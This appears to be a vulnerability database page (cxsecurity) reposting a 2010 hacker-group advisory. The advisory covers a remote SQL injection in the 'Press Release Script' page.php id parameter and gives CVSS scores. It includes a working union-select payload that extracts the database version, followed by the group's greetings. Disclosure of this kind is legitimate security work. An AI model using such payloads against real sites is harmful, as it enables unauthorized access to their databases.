Press Release Script remote SQL injection

2010-05-17 / 2012-08-07
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################{In The Name Of Allah The Mercifull} ###################### [~] Tybe: SQL Injection Vulnerabilities [~] Vendor: www.v-eva.com [+] Software: Press Release Script [+] author: ((R3d-D3v!L)) [~] [+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5)) [~] [?] contact: X[at]hotmail.co.jp [-] [?] Date: 14.Jan.2010 [?] T!ME: 05:15 am GMT [?] Home: ? Offensive Security [?] ====================================================================================== # SQL Injection # (page.php id) ====================================================================================== [*] Err0r C0N50L3: http://127.0.0.1/page.php?id={EV!L EXPLO!T} [*] {EV!L EXPLO!T} page.php?id=-4+union+all+select+1,@@version,3,4-- [~]-----------------------------{((MAGOUSH-87))}------------------------------------------------# # [~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) # # [?]spechial SupP0RT : MY M!ND # ? Offensive Security # # [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) # # [~]spechial FR!ND: 0r45hy # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]--------------------------------------------------------------------------------------------- _________________________________________________________________ Hotmail: Trusted email with powerful SPAM protection. https://signup.live.com/signup.aspx?id=60969


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top